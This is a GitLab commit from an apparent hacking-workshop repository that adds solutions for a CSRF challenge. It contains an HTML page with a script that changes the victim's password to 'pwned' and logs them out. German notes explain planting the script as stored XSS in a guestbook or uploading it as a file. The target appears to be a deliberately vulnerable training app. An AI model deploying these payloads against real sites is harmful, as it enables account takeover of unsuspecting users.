Skip to content
GitLab
Menu
Projects
Groups
Snippets
Help
Help
Support
Community forum
Keyboard shortcuts
?
Submit feedback
Contribute to GitLab
Sign in / Register
Toggle navigation
Menu
Open sidebar
hackfahrschule
ChaosCampHacking
Commits
2f145781
Commit
2f145781
authored
Aug 20, 2019
by
David
Browse files
added csrf challenge
parent
64cd330d
Changes
2
Hide whitespace changes
Inline
Side-by-side
Lösungen der Challenges/Low/CSRF.html
0 → 100644
View file @
2f145781
<html>
<body>
<h1>
Your account has been hacked!
</h1>
<p>
Well, maybe we will give it back to you :-)
</p>
<script>
var
xhttp
=
new
XMLHttpRequest
();
xhttp
.
open
(
"
GET
"
,
"
http://[IP]/vulnerabilities/csrf/?password_new=pwned&password_conf=pwned&Change=Change
"
,
true
);
xhttp
.
send
();
var
xhttp_logout
=
new
XMLHttpRequest
();
xhttp_logout
.
open
(
"
GET
"
,
"
http://[IP]/logout.php
"
);
xhttp_logout
.
send
();
</script>
</body>
\ No newline at end of file
Lösungen der Challenges/Low/CSRF.md
View file @
2f145781
# Normal
# Hack 1
Dies kann ins Gästebuch (Stored XSS) eingefügt werden:
```
<script>
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://[IP]/vulnerabilities/csrf/?password_new=pwned&password_conf=pwned&Change=Change", true);
xhttp.send();
</script>
```
# Hack 2
Die Datei CSRF.html kann nach der notwendigen Anpassung im File-Upload hochgeladen werden.
\ No newline at end of file
Write
Preview
Supports
Markdown
0%
Try again
or
attach a new file
.
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment
